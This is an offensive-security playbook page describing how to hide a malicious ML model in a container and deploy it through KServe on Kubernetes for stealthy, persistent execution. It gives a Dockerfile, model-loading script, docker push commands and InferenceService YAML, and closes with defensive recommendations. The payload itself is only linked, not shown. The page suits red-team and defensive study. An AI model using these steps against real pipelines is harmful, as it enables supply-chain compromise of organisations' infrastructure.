Using kserve - OffSecML Playbook

## **Details** KServe is a model deployment tool for Kubernetes which ingests models using containers, malware can be inserted into a model pipeline via this mechanism. https://github.com/kserve/kserve malicious containers can be placed in the repository of either models or containers (depending on the target environment) and pulled into a KServe execution environment. ## **PoC** - making the malicious docker image, pushing to kserve https://5stars217.github.io/2023-10-25-using-KServe-to-deploy-malicious-models/#poc *Let's take malicious models a step further, and hide a malicious model inside a container.* This builds on two pieces of research posted earlier on this blog: [Making Malicious Models](https://5stars217.github.io/2023-03-30-on-malicious-models/) [Weaponizing Malicious Models via Supply Chain Attacks](https://5stars217.github.io/2023-08-08-red-teaming-with-ml-models/) The benefit of this approach is the stealth - malicious containers are hard to catch, so a container running a model is even less likely to be noticed. Sandboxes for detecting malware struggle with containers, you have to extract the malicious binary and sandbox that. Models are a whole different ballgame, and extraordinarily difficult to detect right now. Once the model is executed in the pipeline, it's within your organizations data 'crown jewels'. ## **What is KServe** [KServe](https://github.com/kserve/kserve ) is a model deployment tool for Kubernetes which ingests models using container images. The point is to allow for quick iterations and consistency across Inference Services (read:execution) such as Nvidia Triton Inference Service, Tensorflow Serving and TorchServe. KServe introduces a few core concepts on top of Kubernetes, but the most important one is the `Predictor` which is the workhorse of the [InferenceService](https://kserve.github.io/website/0.11/modelserving/data_plane/v2_protocol/). The Predictor is simply a model and a model server that makes it available at a network endpoint. > Malware can be inserted into a model pipeline via this mechanism. ### What is important about it Whether you're attacking an MLops Pipeline as either an internal pivot or as part of a supply chain attack from the outside, the odds are high that KServe is valuable component of the target environment. Malicious Containers can be placed in either a container repository or a model repository (depending on the target environment) and pulled into a kserve execution environment for detonation: ## **PoC** #### Making the malicious KServe inference service and pushing to kserve #### The basic steps are as follows: - Create Container Image - Load in the Malicious Model - Build Container Image - Push Container Image - Deploy ## Create Container Image We'll build a container image to be called by the InferenceService later. `vi Dockerfile` ``` FROM ubuntu:22.04 ENV DEBIAN_FRONTEND noninteractive # Set the working directory to /code WORKDIR /code # Copy the current directory contents into the container at /code COPY ./requirements.txt /code/requirements.txt RUN apt-get update RUN apt-get install -y python3.10 RUN apt-get install -y python3-pip # Install requirements.txt RUN pip install --no-cache-dir -r /code/requirements.txt # Set up a new user named "user" with user ID 1000 RUN addgroup user && useradd user -m -u 1000 -g user RUN chmod 755 /home/user # Switch to the "user" user USER user # Set home to the user's home directory ENV HOME=/home/user \ PATH=/home/user/.local/bin:$PATH # Set the working directory to the user's home directory WORKDIR $HOME/app # Copy the current directory contents into the container at $HOME/app setting the owner to the user COPY --chown=user . $HOME/app CMD ["python3", "main.py"] ``` ### Load in the malicious model We'll use a malicious model from the [PoC repo:](https://github.com/5stars217/malicious_models) , as they are designed in a way that the model still performs its usual inference tasks without affecting the underlying math / accuracy of a model: `vi main.py` ``` # mypy: skip-file import os import numpy as np import tensorflow as tf model_dir = os.environ.get("MODEL_DIR", "/mnt/models/model_opendiffusion") print(f"load model {model_dir}") model = tf.keras.models.load_model(model_dir) data = np.random.random((1, 5)) print(model.predict(data).squeeze()) ``` And define a `requirements.txt` ``` numpy tensorflow==2.11 ``` ## Build Container Image `docker build -t malicious_conmondel . ` ` ## Push Container image Specifics depend on target environment, here's the most common pattern: `docker image tag` `docker image push registry-host:5000/malicious-model:latest` ## Internal? Deploy Now that you have the malicious container + model deployed, it can be run willingly or inadvertently in kserve. (operators network positioning dependent) KServe deployments require a yaml specifying their usage: This is close to the bare-minimum required for a yaml for the deployment: `malicious-model.yaml` ``` apiVersion: "serving.kserve.io/v1beta1" kind: InferenceService metadata: labels: target.business.com/deployment: malicious-model kserve.business.com/model-type: sentiment-classifier name: malicious-model spec: predictor: minReplicas: 1 containers: - name: malicious-model-server image: internal-registry.company.net/docker-local/u/user/malicious-model:latest #command: ["sleep"] #args: ["1000"] env: - name: MODEL_DIR value: "/mnt/models/hub/models--opendiffusion--sentimentcheck/snapshots/1234uuid/model_opendiffusion/" - name: STORAGE_URI value: "s3://company-registry/shared/kserve-models/user/opendiffusion/sentimentcheck/1234uuid/model.tgz" ports: - containerPort: 7860 protocol: TCP resources: limits: cpu: 2 memory: 2Gi nvidia.com/gpu: 1 ephemeral-storage: 1Gi ``` You now have a malicious model within a container running in Kubernetes, stored in the appropriate registries to ensure that it always successfully restarts and persists. ## Defensive Recommendations - Use a proxy like Istio proxy to deny any calls to/from the public internet for the KServe service. - Container images and Models should be sourced and stored on an internal registry, with a process for certain team members to ingest models from the web. - Model formats should be restricted to formats such as [safetensors](https://github.com/huggingface/safetensors) - Implement eBPF based runtime detection systems such as `tracee` or `cilium` or closed source. ID:AML.T0010.001